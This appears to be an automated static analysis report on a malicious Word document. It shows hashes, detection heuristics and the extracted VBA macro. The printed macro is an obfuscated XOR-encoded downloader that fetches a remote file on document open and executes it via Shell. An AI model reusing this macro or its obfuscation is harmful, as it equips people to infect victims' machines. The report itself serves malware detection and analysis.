Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 c697226ca95a08d0…

MALICIOUS

Office (OOXML) / .DOCX

20.9 KB Created: 2021-07-11 15:30:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2026-06-22
MD5: 9a75ee89143d942fa3df8cece68edbba SHA-1: 075d752ca17b31ae02c7b2f16521d3425b540c93 SHA-256: c697226ca95a08d09026445d354e0855e122675dedada11f2dcc042633e7e6ee
150 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell fi6ql3mh("8" & "" & ")" & "?" & Chr(56) & "" & Chr(98) & ")" & Chr(52) & "" & ")" & "")
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Declare PtrSafe Function URLDownloadToFile Lib fi6ql3mh("9" & "" & chr(62) & "" & " " & "!" & "#" & "" & chr(34) ) Alias _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4984 bytes
SHA-256: ce1fde006efa49e2622adbb6b39399ea5b8a070cc88ffafd08102e45eaea1fb8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    docusign
End Sub

Attribute VB_Name = "NewMacros"
Function gu81(str As String) As Variant: Dim bytes() As Byte: bytes = str: gu81 = bytes: End Function
Function o39f(bytes() As Byte) As String: Dim str As String: str = bytes: o39f = str: End Function

Function fi6ql3mh(str As String) As String
    Const p_ As String = "iexf375o"
    Dim sb_() As Byte, pb_() As Byte
    sb_ = gu81(str)
    pb_ = gu81(p_)
    
    Dim uL As Long
    uL = UBound(sb_)
    
    ReDim scb_(0 To uL) As Byte
    
    Dim idx As Long
    
    For idx = LBound(sb_) To uL:
        If Not sb_(idx) = 0 Then
            c = sb_(idx)
            For i = 0 To UBound(pb_):
                c = c Xor pb_(i)
            Next i
            scb_(idx) = c
        End If
    
    Next idx
    
    fi6ql3mh = o39f(scb_)
End Function


Declare PtrSafe Function URLDownloadToFile Lib fi6ql3mh("9" & "" & chr(62) & "" & " " & "!" & "#" & "" & chr(34) ) Alias _
    fi6ql3mh(chr(25) & "" & " " & chr(0) & " " & chr(35) & "" & ";" & "" & """" & " " & "" & "#" & "" & chr(45) & "" & chr(40) & "" & " " & "#" & "" & "
" & "" & chr(37) & "" & chr(32) & "" & ")" & chr(13) ) (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Sub sobnf13e()
'
' docusign Macro
'
'
dwn = URLDownloadToFile(0, fi6ql3mh("$" & "" & chr(56) & "8" & chr(60) & "" & "?" & "v" & chr(99) & "c" & "" & chr(63) & chr(121) & chr(60) & "" & chr(42) & "" & chr(39) & "" & "-" & "b" & chr(60) & "$" & "" & chr(98) & chr(42) & chr(37) & " " & chr(41) & "?" & "b" & chr(125) & "" & "(" & "" & ">" & chr(58) & "b" & "" & chr(47) & "" & chr(35) & "!" & "c" & chr(53) & "" & "x" & "!" & "" & " " & "" & " " & chr(28) & "" & "-" & "*" & "" & "a" & "" & "}" & chr(126) & "" & chr(54) & "" & " " & " " & "{" & "" & "~" & "" & chr(126) & "" & "6" & "(" & "6" & chr(14) & "" & "
" & "" & chr(13) & chr(4) & chr(0) & "" & "z" & chr(61) & "" & chr(62) & "" & chr(62) & "" & "9" & chr(28) & "" & " " & " " & "" & "-" & chr(59) & chr(13) & "u" & "" & chr(32) & " " & "" & chr(126) & " " & " " & "" & chr(19) & " " & " " & chr(54) & chr(21) & " " & "" & ":" & "" & chr(43) & "t" & "" & "/" & "" & "=" & "" & ";" & "" & " " & "" & chr(28) & "" & " " & "" & ">" & chr(9) & " " & chr(37) & "" & "?" & "" & " " & chr(22) & "    " & "" & " " & "" & chr(54) & "*" & "*" & "" & " " & "5" & "" & chr(37) & "" & " " & "  " & "" & chr(24) & chr(59) & "" & chr(0) & "x" & "" & ">" & "" & chr(56) & "" & "." & "" & "4" & "" & " " & "" & " " & "" & chr(126) & "" & chr(14) & " " & "" & chr(34) & chr(57) & "" & " " & chr(34) & "" & chr(54) & chr(24) & "" & chr(53) & "" & chr(124) & "" & " " & "" & " " & chr(14) & "" & " " & "" & " " & "" & "'" & "" & chr(6) & "" & "/" & chr(58) & "" & "-" & "" & chr(41) & chr(7) & "!" & " " & "" & "/" & "" & " " & "=" & "" & " " & "" & chr(40) & "!" & "" & "a" & "" & chr(2) & chr(3
4) & " " & chr(42) & "" & chr(46) & "" & chr(125) & chr(120) & "" & "}" & "#" & "" & chr(43) & " " & "" & chr(122) & "{" & chr(26) & "" & chr(45) & "a" & "" & chr(39) & chr(121) & "" & " " & "" & " " & chr(13) & "" & chr(53) & " " & "" & chr(20) & " " & "" & "9" & "" & ":" & "" & " " & "%" & "" & chr(34) & chr(61) & "" & ")" & "" & chr(6) & " " & ";" & "-" & " " & "" & ">" & "" & chr(7) & "" & "
" & "" & chr(45) & " " & chr(20) & " " & "" & chr(21) & "" & chr(7) & "" & " " & "" & "x" & "
" & "" & chr(127) & chr(9) & chr(15) & "" & chr(2) & "x" & "" & chr(19) & "" & "&" & "" & "6" & "" & """" & "'" & "" & " " & "  " & " " & "" & "<" & chr(57) & "" & "x" & chr(58) & "" & chr(2) & "'" & "" & chr(53) & "
" & "" & chr(97) & "" & "#" & "" & chr(40) & chr(123) & "" & chr(31) & "" & chr(123) & " " & "?" & "" & chr(38) & chr(117) & chr(60) & "" & chr(10) & "" & "~" & chr(1) & "" & chr(116) & chr(62) & " " & "" & " " & "" & "\00" & "" & chr(8) & "" & chr(38) & "" & chr(45) & chr(7) & chr(126) & "" & chr(56) & "" & "\00" & chr(42) & chr(4) & "" & " " & " " & chr(13) & chr(40) & "" & " " & "" & chr(0) & "" & chr(1) & "" & chr(97) & "" & chr(1) & "" & " " & chr(40) & " " & "" & " " & "+" & "" & chr(120) & "" & chr(54) & "" & "}" & "" & chr(97) & chr(97) & chr(21) & "" & chr(22) & chr(32) & "4" & "" & " " & chr(115) & "" & "
" & chr(26) & "" & chr(3) & chr(58) & "" & ")" & "" & chr(62) & "" & ">" & chr(37) & chr(40) & "" & chr(41) & "" & chr(113) & "" & chr(125) & "" ),fi6ql3mh("8" & "" & ")" & "?" & chr(56) & "" & chr(98) & ")" & chr(52) & "" & ")" & "" ), 0, 0)
Shell fi6ql3mh("8" & "" & ")" & "?" & Chr(56) & "" & Chr(98) & ")" & Chr(52) & "" & ")" & "")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 16896 bytes
SHA-256: 8344173b2a2093ca59c1be8f2d2d6d5c100a08372b9b9a06d40d28b9abf31eda

Open this report in the interactive analyzer, or submit your own file for analysis.